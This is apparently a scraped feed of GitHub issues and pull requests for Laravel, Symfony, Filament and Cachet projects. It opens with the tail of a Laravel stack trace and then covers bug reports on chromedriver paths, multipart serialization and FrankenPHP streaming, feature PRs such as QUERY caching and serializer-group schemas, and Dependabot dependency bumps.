#39 /app/vendor/livewire/livewire/src/Mechanisms/HandleRequests/RequireLivewireHeaders.php(19): Illuminate\\Pipeline\\Pipeline->{closure:Illuminate\\Pipeline\\Pipeline::prepareDestination():178}(Object(Illuminate\\Http\\Request))
#40 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Livewire\\Mechanisms\\HandleRequests\\RequireLivewireHeaders->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#41 /app/vendor/laravel/framework/src/Illuminate/Routing/Middleware/SubstituteBindings.php(52): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#42 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Routing\\Middleware\\SubstituteBindings->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#43 /app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/PreventRequestForgery.php(104): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#44 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Foundation\\Http\\Middleware\\PreventRequestForgery->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#45 /app/vendor/laravel/framework/src/Illuminate/View/Middleware/ShareErrorsFromSession.php(48): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#46 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\View\\Middleware\\ShareErrorsFromSession->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#47 /app/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php(120): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#48 /app/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php(63): Illuminate\\Session\\Middleware\\StartSession->handleStatefulRequest(Object(Illuminate\\Http\\Request), Object(Illuminate\\Session\\Store), Object(Closure))
#49 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Session\\Middleware\\StartSession->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#50 /app/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/AddQueuedCookiesToResponse.php(36): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#51 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Cookie\\Middleware\\AddQueuedCookiesToResponse->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#52 /app/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/EncryptCookies.php(74): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#53 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Cookie\\Middleware\\EncryptCookies->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#54 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(137): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#55 /app/vendor/laravel/framework/src/Illuminate/Routing/Router.php(821): Illuminate\\Pipeline\\Pipeline->then(Object(Closure))
#56 /app/vendor/laravel/framework/src/Illuminate/Routing/Router.php(800): Illuminate\\Routing\\Router->runRouteWithinStack(Object(Illuminate\\Routing\\Route), Object(Illuminate\\Http\\Request))
#57 /app/vendor/laravel/framework/src/Illuminate/Routing/Router.php(764): Illuminate\\Routing\\Router->runRoute(Object(Illuminate\\Http\\Request), Object(Illuminate\\Routing\\Route))
#58 /app/vendor/laravel/framework/src/Illuminate/Routing/Router.php(753): Illuminate\\Routing\\Router->dispatchToRoute(Object(Illuminate\\Http\\Request))
#59 /app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(200): Illuminate\\Routing\\Router->dispatch(Object(Illuminate\\Http\\Request))
#60 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(180): Illuminate\\Foundation\\Http\\Kernel->{closure:Illuminate\\Foundation\\Http\\Kernel::dispatchToRouter():197}(Object(Illuminate\\Http\\Request))
#61 /app/vendor/livewire/livewire/src/Features/SupportDisablingBackButtonCache/DisableBackButtonCacheMiddleware.php(19): Illuminate\\Pipeline\\Pipeline->{closure:Illuminate\\Pipeline\\Pipeline::prepareDestination():178}(Object(Illuminate\\Http\\Request))
#62 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Livewire\\Features\\SupportDisablingBackButtonCache\\DisableBackButtonCacheMiddleware->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#63 /app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/ConvertEmptyStringsToNull.php(27): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#64 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Foundation\\Http\\Middleware\\ConvertEmptyStringsToNull->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#65 /app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/TrimStrings.php(47): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#66 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Foundation\\Http\\Middleware\\TrimStrings->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#67 /app/vendor/laravel/framework/src/Illuminate/Http/Middleware/ValidatePostSize.php(27): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#68 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Http\\Middleware\\ValidatePostSize->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#69 /app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/PreventRequestsDuringMaintenance.php(109): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#70 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Foundation\\Http\\Middleware\\PreventRequestsDuringMaintenance->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#71 /app/vendor/laravel/framework/src/Illuminate/Http/Middleware/HandleCors.php(61): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#72 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Http\\Middleware\\HandleCors->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#73 /app/vendor/laravel/framework/src/Illuminate/Http/Middleware/TrustProxies.php(58): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#74 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Http\\Middleware\\TrustProxies->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#75 /app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/InvokeDeferredCallbacks.php(22): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#76 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Foundation\\Http\\Middleware\\InvokeDeferredCallbacks->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#77 /app/vendor/laravel/framework/src/Illuminate/Http/Middleware/ValidatePathEncoding.php(28): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#78 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Http\\Middleware\\ValidatePathEncoding->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#79 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(137): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#80 /app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(175): Illuminate\\Pipeline\\Pipeline->then(Object(Closure))
#81 /app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(144): Illuminate\\Foundation\\Http\\Kernel->sendRequestThroughRouter(Object(Illuminate\\Http\\Request))
#82 /app/vendor/laravel/framework/src/Illuminate/Foundation/Application.php(1220): Illuminate\\Foundation\\Http\\Kernel->handle(Object(Illuminate\\Http\\Request))
#83 /app/public/index.php(20): Illuminate\\Foundation\\Application->handleRequest(Object(Illuminate\\Http\\Request))
#84 {main}
"}
View more
gp-lnuff

gp-lnuff

14th Jul 2026 @ 10:51

On Windows I get the error message "Symfony\Component\Panther\Exception\RuntimeException: Could not start chrome. Exit code: 1 (General error). Error output: The command "." is either misspelled or could not be found." To fix the issue on Windows I changed the hardcoded path "./drivers" in ChromeManager::findChromeDriverBinary (line 89 in version 2.2.0) to ".\drivers".

Searching for the issue I found that in some older versions of Panther it was possible to create a ChromeClient directly, telling it the drivers-path as a parameter, but this seems to be removed and I couldn't find a way to do it with the current version. (Using Client::createChromeClient() with the binary-path does not work either, it throws a "Facebook\WebDriver\Exception", also setting PANTHER_CHROME_BINARY to my path did not change anything.)

Question: Am I missing something or can I still set a custom drivers-path somehow? Or should the hardcoded path in ChromeManager use the DIRECTORY_SEPARATOR instead of a slash?

View more
knallcharge

knallcharge

20th Feb 2025 @ 11:56

Feature Status: Needs Review HttpClient
Q A
Branch? 8.2
Bug fix? no
New feature? yes
Deprecations? no
Issues Fix -
License MIT

Adds QUERY to the list of cacheable, safe HTTP methods in CachingHttpClient.

QUERY carries its payload in the request body, so:

  • a body no longer disqualifies a QUERY request from caching (only a non-string/streamed body does)
  • the cache key now folds in the request body and Content-Type, so different QUERY payloads to the same URL don't collide in the cache
View more
1 comment
ayyoub-afwallah

ayyoub-afwallah

11th Jul 2026 @ 16:10

Feature
View more
6 comments 👍 2
weaverryan

weaverryan

12th Jun 2017 @ 18:17

View more
7 comments 👍 1
Kocal

Kocal

12th Nov 2025 @ 07:36

dependencies github_actions

Bumps shivammathur/setup-php from 2 to 2.37.1.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the Security Alerts page.
View more
dependabot[bot]

dependabot[bot]

20th May 2026 @ 15:57

Conflict between options [-i|--invokable] and [-i| --id=ID] The App ID

View more
ctapyxin

ctapyxin

28th Oct 2025 @ 22:57

dependencies javascript

Bumps the dev-dependencies group with 4 updates: autoprefixer, postcss, prettier and vite.

Updates autoprefixer from 10.5.1 to 10.5.2

Updates postcss from 8.5.15 to 8.5.16

Updates prettier from 3.8.4 to 3.9.4

Updates vite from 8.1.0 to 8.1.2

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore <dependency name> major version will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)
  • @dependabot ignore <dependency name> minor version will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)
  • @dependabot ignore <dependency name> will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)
  • @dependabot unignore <dependency name> will remove all of the ignore conditions of the specified dependency
  • @dependabot unignore <dependency name> <ignore condition> will remove the ignore condition of the specified dependency and ignore conditions
View more
dependabot[bot]

dependabot[bot]

1st Jul 2026 @ 10:35

Laravel Version

13.12.0

PHP Version

8.5.0

Database Driver & Version

No response

Description

The v13.9.0 release included a fix that changes the serialization of array fields in multipart forms (See PR #59984). As far as I understand, this was intended as a minor fix that shouldn't cause any regressions. But it did break some things, for example in the laravel/ai package.

I haven't looked into this too much, but it seems like some parsers interpret multipart forms differently, and the change in serialization breaks at least some Python parsers.

Here's an AI-generated summary of the issues I've ran into debugging with Gemini:

The Serialization Discrepancy

When passing an array value such as ['timestamp_granularities' => ['segment']] in a multipart request:

Before v13.9.0: Laravel serialized the array by repeating the exact key name:

Content-Disposition: form-data; name="timestamp_granularities"

segment

After v13.9.0: Guzzle delegates serialization to PSR-7, which appends PHP-style brackets [] to the key name:

Content-Disposition: form-data; name="timestamp_granularities[]"

segment

Why this breaks Python / FastAPI / Pydantic APIs

Unlike PHP, many API backends built in Python (using FastAPI, Pydantic, or python-multipart ) do not interpret trailing [] as arrays automatically.

Instead, the parser:

  1. Looks strictly for the exact parameter name ( timestamp_granularities ).
  2. Treats timestamp_granularities[] as an unrelated, unknown key and discards it.
  3. Sees the parameter timestamp_granularities as missing/empty, resulting in 422 Unprocessable Entity validation errors (e.g. timestamp granularity must be set to ['segment'], got [] ).

This regression breaks out-of-the-box integrations with third-party APIs served by Python backends (such as Mistral AI's Voxtral STT).

Steps To Reproduce

I reproduced this error using laravel/ai. You can see more details in this PR: laravel/ai/pull/671

View more
3 comments
NoelDeMartin

NoelDeMartin

29th May 2026 @ 11:40

Description

When running Laravel under Octane with FrankenPHP, a generator callback passed to response()->stream() returns a 200 OK response with Content-Length: 0 and no body.

The same streamed response implemented with echo + flush() works and returns the expected SSE body.

This appears to be in Octane's FrankenPHP response handling. I originally filed this in laravel/framework, but the failing path is in the FrankenPHP client:

Observed versions:

  • Laravel Framework: 13.14.0
  • Laravel Octane: 2.17.4
  • FrankenPHP: 1.12.3
  • PHP: 8.5.6

Steps To Reproduce

Add these two routes to a Laravel app running under Octane/FrankenPHP:

use Illuminate\Support\Facades\Route;

Route::get('/sse-yield', fn () => response()->stream(function (): iterable {
    yield "data: hello\n\n";
    yield "data: [DONE]\n\n";
}, headers: ['Content-Type' => 'text/event-stream']));

Route::get('/sse-echo', fn () => response()->stream(function (): void {
    echo "data: hello\n\n";
    flush();

    echo "data: [DONE]\n\n";
    flush();
}, headers: ['Content-Type' => 'text/event-stream']));

Run Octane with FrankenPHP:

php artisan octane:frankenphp --workers=4 --watch

Request both endpoints:

curl -i http://localhost:8000/sse-yield
curl -i http://localhost:8000/sse-echo

Observed result for /sse-yield:

HTTP/1.1 200 OK
Content-Type: text/event-stream; charset=utf-8
X-Accel-Buffering: no
Content-Length: 0

Observed result for /sse-echo:

HTTP/1.1 200 OK
Content-Type: text/event-stream; charset=utf-8
Transfer-Encoding: chunked

data: hello

data: [DONE]

Expected result: /sse-yield should stream the yielded chunks, like it does outside this Octane/FrankenPHP path, or like the echo implementation does.

View more
1 comment
tecbeast42

tecbeast42

5th Jun 2026 @ 14:01

RFC

I would like to suggest a new component, ShareLink

Similar to the CalendarLink component, it would allow you to generate URLs for sharing a page across multiple platforms (email, Facebook, X, Threads, WhatsApp, etc.) using twig functions ux_share_link and ux_share_links

WDYT ?

View more
2 comments 👍 1
ker0x

ker0x

9th Jun 2026 @ 15:17

enhancement

Note: We are not looking for a community member to build this feature, it will be handled a member of the Filament core team when we have availability.

View more
2 comments
danharrin

danharrin

4th Apr 2026 @ 12:11

unknown error: Chrome failed to start: crashed. (unknown error: DevToolsActivePort file doesn't exist) (The process started from chrome location /usr/bin/google-chrome is no longer running, so ChromeDriver is assuming that Chrome has crashed.)

This error occurs on ubuntu 22.04 On Mac OS everything worked fine

View more
rekreg

rekreg

13th Feb 2025 @ 21:59

Bug Status: Needs Review Messenger
Q A
Branch? 8.1
Bug fix? yes
New feature? no
Deprecations? no
Issues -
License MIT

This fixes a loop where Worker keeps dispatching an envelope after its batch handler has already acknowledged or rejected the message.

Why it happens

While a batch is waiting for more messages, Worker saves one envelope for its batch handler in DeferredBatchMessageQueue.

The saved DeferredBatchMessage contains two important pieces of state:

  • its envelope has NoAutoAckStamp, which records that the handler did not acknowledge the message during its first dispatch; and
  • its acked property refers to the boolean changed later by the message's Acknowledger.

When another message fills the batch, the handler processes the batch and calls ack() or nack() for every message. This changes the saved message's acked property to true, but its envelope remains in DeferredBatchMessageQueue with NoAutoAckStamp.

On the next empty worker loop, Worker::flush() removes that saved entry and dispatches its envelope with FlushBatchHandlersStamp. After the dispatch, the existing code decides whether to save the envelope again:

if (!$deferredMessage->acked && !$noAutoAckStamp) {
    $this->acks[] = [$transportName, $envelope, $e];
} elseif ($noAutoAckStamp) {
    $this->unacks->add(/* ... */);
}

For a completed message, the first condition is false because acked is true. The second condition is still true because the saved envelope keeps NoAutoAckStamp. The completed envelope is therefore saved again.

The same steps repeat on every empty worker loop:

  1. remove the saved envelope;
  2. dispatch it;
  3. see NoAutoAckStamp; and
  4. save it again.

This is an in-process loop; the transport does not return the message again. In the reproduced idle case, the batch is empty, so its process() method has no jobs to run. The extra dispatches still run the message bus and its middleware.

The fix

Worker::flush() now checks DeferredBatchMessage::$acked twice:

  1. Before dispatch: the batch may have completed while this envelope was waiting in the flush queue. In that case, no flush dispatch is needed.
  2. After dispatch: the flush itself may have completed the batch. In that case, the envelope must not be saved again.

A message with acked === false follows the existing behavior.

Test

The regression test sends 10 messages to a batch handler with a batch size of 10. It uses MockClock to keep the worker running for 30 simulated seconds after the batch completes.

Result Before After
Messages processed 10 10
Transport acknowledgements 10 10
Message-bus dispatches 41 10

Before this fix, the 41 dispatches are the 10 received messages, 30 idle-loop dispatches, and one final dispatch when the worker stops. After this fix, each received message is dispatched exactly once.

View more
1 comment
Gaitholabi

Gaitholabi

10th Jul 2026 @ 17:58

Feature Console Status: Needs Review Deprecation
Q A
Branch? 8.2
Bug fix? no
New feature? yes
Deprecations? yes
Issues -
License MIT

Currently, when handleSignal() needs access to the input or output, you first need to store the objects in properties because they are not passed to the method, for example:

use Symfony\Component\Console\Attribute\AsCommand;
use Symfony\Component\Console\Command\SignalableCommandInterface;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;

#[AsCommand(name: 'app:my-command')]
class MyCommand implements SignalableCommandInterface
{
    private ?OutputInterface $output = null;

    public function __invoke(OutputInterface $output): int
    {
        $this->output = $output;

        // ...
    }

    public function handleSignal(int $signal, int|false $previousExitCode = 0): int|false
    {
        $this->output?->writeln(\sprintf('Received signal %d.', $signal));

        return false;
    }
}

This PR adds two new optional parameters to SignalableCommandInterface::handleSignal(): ?InputInterface $input = null and ?OutputInterface $output = null.

This improves the developer experience by removing the need to store these objects as properties solely so they can be accessed from handleSignal().

View more
HypeMC

HypeMC

13th Jul 2026 @ 09:26

Platform Feature Status: Needs Review
Q A
Bug fix? no
New feature? yes
Docs? no
Issues -
License MIT

Problem

PropertyInfoDescriber already supports serializer-group filtering — its array $serializerGroups = ['*'] constructor argument is forwarded to SerializerExtractor::getProperties($class, ['serializer_groups' => ...]).

But that filter is only settable when constructing the describer, and there is no way to pass groups per call: Factory::buildProperties() / buildParameters() accept no context, and ObjectSubject carries none. So a consumer cannot ask for "the schema of class X, limited to the write group" without hand-rolling a Factory with a bespoke PropertyInfoDescriber.

Motivation

Structured output and agent/tool write-back over domain objects want to expose only an editable subset of a class (a #[Groups(['write'])] view) rather than every property. This is the API-Platform pattern (JSON Schema derived from serializer groups). The machinery is present but unreachable.

Solution

Thread an optional $context from Factory down to the describers:

  • Factory::buildProperties(string $className, array $context = []) and buildParameters(string $className, string $methodName, array $context = [])
  • ObjectSubject carries it and exposes getContext()
  • PropertyInfoDescriber::describeObject() prefers a per-call serializer_groups context over the groups it was constructed with
  • SerializerDescriber propagates the context into the discriminator anyOf sub-schemas, so nested schemas stay group-scoped
$factory->buildProperties(GroupedDto::class, ['serializer_groups' => ['write']]);
// => only the properties in the "write" group

The serializer_groups context key is deliberately the Serializer-native one already used by PropertyInfoDescriber / SerializerExtractor, so nothing new is invented.

Alternative considered

A dedicated GroupsDescriber post-filtering emitted PropertySubjects against ClassMetadataFactory. Rejected as redundant: PropertyInfoDescriber + SerializerExtractor already filter — threading the option reuses that path and avoids loading class metadata twice.

BC

Fully backward compatible. The new arguments default to [] / ['*']; existing callers and emitted schemas are unchanged (covered by a regression test).

Tests

FactoryTest gains three cases against a new GroupedDto fixture: no context yields all properties (regression), a single group and multiple groups yield only the grouped properties, with required / additionalProperties recomputed accordingly.

Full src/platform suite is green (744 tests). PHPStan reports one pre-existing TypeInfoDescriber generics error that is present on unmodified main and unrelated to this change.

View more
chr-hertel

chr-hertel

14th Jul 2026 @ 12:38

After upgrading to v3.2.2, i've noticed that declaration order of stimulus controllers in HTML matters. In my project I'm using symfony/ux-autocomplete and I have a custom controller to override tom-select options rendering. All my controllers are fetch in eager mode.

Here is an example :

<select id="new_link_sap_order_item" class="form-control" required
        {{ stimulus_controller({
            'symfony/ux-autocomplete/autocomplete':{
                url: path('colporteur_find_sap_order_lines')
            },
            'colporteur--sap-order-item-select':{},
        }) }}>
</select>

Not declaring colporteur--sap-order-item-select before symfony/ux-autocomplete/autocomplete in the HTML, leads to custom controller connecting but never intercepting the autocomplete:pre-connect event dispatched by ux-autocomplete controller.

Obviously, i've fix this by putting my custom controller in first position :

<select id="new_link_sap_order_item" class="form-control" required
        {{ stimulus_controller({
            'colporteur--sap-order-item-select':{},
            'symfony/ux-autocomplete/autocomplete':{
                url: path('colporteur_find_sap_order_lines')
            }
        }) }}>
</select>

But I do not really like things that depends on declaration order to work. Is this a wanted behaviour ? Maybe I'm opening issue in the wrong repo and should open it on symfony/ux one ?

View more
1 comment
Wait4Code

Wait4Code

23rd Aug 2023 @ 09:29

Could some one help me how to connect to postgres database with SSL from Cachet

View more
prabhakartalari

prabhakartalari

14th Jun 2022 @ 12:55

dependencies php

Bumps laravel/tinker from 2.11.1 to 3.0.2.

Note Automatic rebases have been disabled on this pull request as it has been open for over 30 days.

View more
dependabot[bot]

dependabot[bot]

17th Apr 2026 @ 02:04

View more
Mynyx

Mynyx

13th Apr 2026 @ 09:08

Image

Need to add the ability to link the Schedule to Component and sent message to Subscriber in line with the Subscriber settings.

View more
👍 3
glipschitz

glipschitz

19th Jan 2025 @ 03:18

Hello,

I’m trying to install symfony/ux-chartjs. Just before that, I upgraded my project to Symfony 7.4.*. The Symfony Flex bundle is in version v2.10.0, and ux-chartjs is in v2.31.0.

During the Composer installation, I get the following error:

Symfony operations: 1 recipe (10c8450d5f6cd321a351399032a77ff4)
  - Configuring symfony/ux-chartjs (>=v2.31.0): From auto-generated recipe

In PackageJsonSynchronizer.php line 107:
                                                      
  Trying to access array offset on value of type int  

To quickly move forward, I temporarily modified PackageJsonSynchronizer.php at line 107 to avoid the error.

It looks like the issue might be related to an unexpected value in the package.json handling within the ux-chartjs bundle.

// before
if ('@' !== $name[0] || !str_starts_with($version, 'file:'.$this->vendorDir.'/') || !str_contains($version, '/assets')) {
    continue;
}

// after
if ((is_array($name) && '@' !== $name[0]) || !str_starts_with($version, 'file:'.$this->vendorDir.'/') || !str_contains($version, '/assets')) {
    continue;
}

Please let me know if you need more details or a reproducible example.

View more
2 comments
fabgg

fabgg

17th Dec 2025 @ 08:28

the app presents two choices:

  • Browse application
  • Browse backend

if you pick the first one there is no place where you can login, if you pick the second one you have a login page but if you login as regular user you face an AccessDeniedHttpException exception

maybe a working demo for new user would be nicer, it's already a demo that shows very limited symfony capabilities

View more
1 comment
samcat74

samcat74

1st Jan 2026 @ 12:54

Summary

  • Implements hybrid event sourcing using Verbs by Thunk
  • Eloquent remains the source of truth for reads (Filament, API, status page)
  • Verbs captures all state changes for audit trails and replay capability
  • Includes migration to initialize events for existing data

Changes

New Dependencies

  • hirethunk/verbs - Event sourcing package

New State Classes (4)

Track current state of each resource:

  • ComponentState - status history, incident/schedule associations
  • ComponentGroupState - component memberships
  • IncidentState - status history, affected components, updates
  • ScheduleState - affected components, updates

New Event Classes (20)

Capture all state changes:

  • Components: Created, Updated, Deleted, StatusChanged
  • ComponentGroups: Created, Updated, Deleted
  • Incidents: Created, Updated, Deleted, UpdateRecorded, ComponentAttached/Detached
  • Schedules: Created, Updated, Deleted, Completed, UpdateRecorded, ComponentAttached/Detached

Modified Action Classes

All create/update/delete actions now fire Verbs events. Events handle:

  1. State updates via apply()
  2. Eloquent persistence via handle()
  3. Webhook dispatch via Verbs::unlessReplaying()

Modified Filament Pages

All create/edit pages route through action classes to ensure Verbs captures changes:

  • Component, ComponentGroup, Incident, Schedule pages
  • Components widget status toggle

Migration

2026_01_12_000000_initialize_verbs_events.php creates initial events for existing data:

  • Runs automatically on php artisan migrate
  • Skips if events already exist (idempotent)
  • Supports rollback via down() method

Test plan

  • All 356 existing tests pass
  • Verify events are created when using API endpoints
  • Verify events are created when using Filament dashboard
  • Verify webhook events still fire correctly
  • Test migration on database with existing data

🤖 Generated with Claude Code

View more
jbrooksuk

jbrooksuk

13th Jan 2026 @ 08:59

This commit adds support for doctrine/dbal ^4 and doctrine/persistence ^4.

Changes:

  • Updated composer.json to allow doctrine/dbal ^4 and doctrine/persistence ^4
  • Added required return type annotations : void to methods implementing interfaces from doctrine/persistence 4:
    • MutableAclProvider::propertyChanged() (implements PropertyChangedListener interface)
    • Acl::addPropertyChangedListener() (implements NotifyPropertyChanged interface)
  • Fixed foreign key constraints in Schema.php to use table names instead of Table objects (DBAL 4 requirement)

Note: The return type annotations are now required (not optional) because the interfaces in doctrine/persistence 4 have these return types defined. Without them, PHP will throw a fatal error about incompatible method signatures.

View more
ireneperezddc1

ireneperezddc1

13th Mar 2026 @ 09:17

enhancement pending review

Summary

Closes discussion #19515.

Adds an opt-in strict hierarchical breadcrumbs mode, configurable per-panel via Panel::breadcrumbs():

$panel->breadcrumbs(strictHierarchical: true);

By default, breadcrumbs for a page are built from its resource and parent record relationships (e.g. an EditRecord page's breadcrumbs come from its resource's list/view pages, plus any parent resources for nested resources). When strict hierarchical mode is enabled, breadcrumbs are instead (additionally) built by walking the page's full navigational hierarchy — cluster ancestry, navigation group, and navigation parent item — and combining that chain with the existing resource/parent-record breadcrumbs.

Changes

  • Filament\Panel\Concerns\HasBreadcrumbs: extended breadcrumbs() with a second bool|Closure $strictHierarchical = false parameter, and added hasStrictHierarchicalBreadcrumbs() alongside the existing hasBreadcrumbs().
  • Filament\Pages\Page: added $breadcrumb property, getBreadcrumb(), and getHierarchicalBreadcrumbs(), which recursively resolves cluster, navigation group, and navigation parent item breadcrumbs for a page. getBreadcrumbs() now checks Filament::getCurrentOrDefaultPanel()->hasStrictHierarchicalBreadcrumbs() and prepends the hierarchical chain when enabled.
  • Filament\Resources\Pages\Page: getResourceBreadcrumbs() now checks strict mode first and, when enabled, prepends static::getHierarchicalBreadcrumbs() ahead of the existing resource/parent-record breadcrumbs; falls back to the previous cluster-only behavior otherwise.

Behavior

  • Strict mode disabled (default): unchanged — breadcrumbs resolve exactly as before, via cluster + resource/parent-record relationships.
  • Strict mode enabled: breadcrumbs are [...hierarchical chain, ...resource/parent-record breadcrumbs, page's own breadcrumb]. The hierarchical chain and resource/record breadcrumbs are combined, not one replacing the other.
View more
4 comments
ahmed-rashad-alnaggar

ahmed-rashad-alnaggar

12th Jul 2026 @ 09:58

Platform

When configuring both Albert and Generic bridges, the base_url convention is inconsistent, which is confusing, especially when using both platforms side by side (e.g. Albert + a vLLM instance via Generic).

Albert requires the API version in base_url and validates it:

ai:
    platform:
        albert:
            base_url: 'https://albert.example.com/v1'  # /v1 required here

Internally calls /chat/completions (no version in path).

Generic expects the version in the path (default /v1/chat/completions):

ai:
    platform:
        generic:
            default:
                base_url: 'https://vllm.example.com'  # no /v1 here

Internally calls /v1/chat/completions.

Both produce the same final URL, but the configuration expectation is opposite. There is no error when Generic's base_url accidentally includes /v1, it silently produces /v1/v1/chat/completions.

Expected behavior

Both bridges should follow the same convention: either the version always belongs in base_url, or always in the path.

References

  • Albert/Factory.php: validates /v\d+ at end of base_url, passes completionsPath: '/chat/completions'
  • Generic/Factory.php: defaults to completionsPath: '/v1/chat/completions'
View more
3 comments
jvancoillie

jvancoillie

25th Jun 2026 @ 04:42

Bug Status: Needs Review HttpClient

Symfony version(s) affected

8.1.1

Description

When the Request sent through the client does not specify support for compressed response, the client transparently adds an Accept-encoding: gzip header, and if the received response's body is indeed gzip-encoded, it does decode it transparently before passing it back to the caller.

